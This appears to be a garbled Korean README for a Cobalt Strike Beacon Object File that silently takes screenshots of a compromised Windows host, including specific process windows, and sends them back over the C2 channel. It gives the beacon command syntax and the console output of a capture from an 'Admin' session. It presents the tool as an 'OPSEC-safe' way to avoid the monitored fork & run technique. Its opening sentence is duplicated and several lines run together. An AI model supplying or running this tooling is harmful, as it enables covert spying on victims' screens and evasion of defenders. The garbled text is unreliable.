
Cobalt Strike를 위한 대체 스크린샷 기능으로, WinAPI를 사용하며 fork & run을 수행하지 않습니다. 스크린샷이 메모리로 다운로드됩니다.
Cobalt Strike를 위한 대체 스크린샷 기능으로, WinAPI를 사용하며 fork & run을 수행하지 않습니다. 스크린샷이 메모리에서 다운로드됩니다.
make 실행0: 전체 화면 캡처 (PID = 0) 특정 PID: 특정 PID 캡처 (최소화된 상태에서도 작동!)
screenshot_bof를 인수 없이 실행하면 GUI 대화상자가 표시됩니다beacon> screenshot_bof file.jpg 2 21964 0 90 100
[*] Running screenshot BOF by (@codex_tf2)
[+] host called home, sent: 12421 bytes
[+] received output:
Downloading JPEG over beacon as a screenshot with filename file.jpg
[*] received screenshot of Screenshot from Admin (26kb)
[+] received output:
Screenshot saved/downloaded successfully
Cobalt Strike는 스크린샷 명령을 포함한 많은 사후 침투 기능에 fork & run 기술을 사용합니다. 이 동작은 안정성을 제공하지만, 현재는 잘 알려져 있으며 집중적으로 모니터링되고 있습니다. 이 BOF는 스크린샷 기능의 더 OPSEC 안전한 버전을 제공하기 위해 만들어졌습니다.
평소와 같은 면책 조항입니다. 이 형편없는 코드를 사용하여 저지른 반인류적 범죄나 촉발한 핵전쟁에 대해 저는 책임지지 않습니다.